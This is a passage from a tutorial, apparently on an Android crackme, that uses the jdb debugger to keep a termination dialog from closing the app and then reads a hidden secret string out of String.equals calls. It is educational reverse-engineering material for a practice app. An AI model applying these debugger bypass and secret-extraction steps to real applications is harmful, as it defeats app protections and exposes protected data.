suspended. < stop in android.app.Dialog.setCancelable Set breakpoint android.app.Dialog.setCancelable < resume All threads resumed. < Breakpoint hit: “thread-main”, android.app.Dialog.setCancelable(), line-1, 205 bci-0 main[1] _ 13. The application is suspended at the first setCancelable method instruction. You can use the locals command to print the arguments passed to the setCancelable method: main[1] locals Method arguments: flag = true Local variables: main[1] _ As you can see in the code above, the system called the setCancelable(true) method, so that’s not the call we need. Let’s resume the process with the resume command: main[1] resume All threads resumed. < Breakpoint hit: “thread-main”, android.app.Dialog.setCancelable(), line-1, 205 bci-0 main[1] locals Method arguments: flag = false Local variables: main[1] _ We’ve reached a call to the setCancelable method with the false argument. At this point, we need to use the set command to change the variable to true and resume the app: main[1] set flag = true flag = true = true main[1] resume All threads resumed. < Breakpoint hit: “thread-main”, android.app.Dialog.setCancelable(), line-1, 205 bci-0 main[1] _ Continue setting flag to true each time you reach a breakpoint until the alert window is finally displayed. It may take about five or six attempts before you see this window. At this point, you should be able to cancel the app without causing the application to terminate — just tap the screen next to the dialog window and it will close. 14. Finally, it’s time to extract the secret string. Look at the application code once more. You’ll notice that the string we’re looking for is decrypted with the Advanced Encryption Standard and is compared with the string the user enters into the message box. The application uses the equals method of the java.lang.String class to determine if the string input matches the secret string. Now set a method breakpoint on java.lang.String.equals, enter random text in the edit field, and tap VERIFY. You can read the method argument with the locals command once you reach the breakpoint: <> stop in java.lang.String.equals Set breakpoint java.lang.String.equals < Breakpoint hit: “thread-main”, java.lang.String.equals(), line=944 bc1=2 main[1] locals Method arguments: anObject = “b” Local variables: main[1] cont < Breakpoint hit: “thread-main”, java.lang.String.equals(), line=944 bci=2 main[1] locals Method arguments: anObject = “i” Local variables: main[1] _ ……… main[1] locals Method arguments: anObject = “I want to believe” Local variables: main[1] _ Bingo! Our secret string is “I want to believe.” You can easily check if that’s right by entering this phrase into the message box and clicking the VERIFY button. Ok Next Part Soon Uploading Thanks U My Friends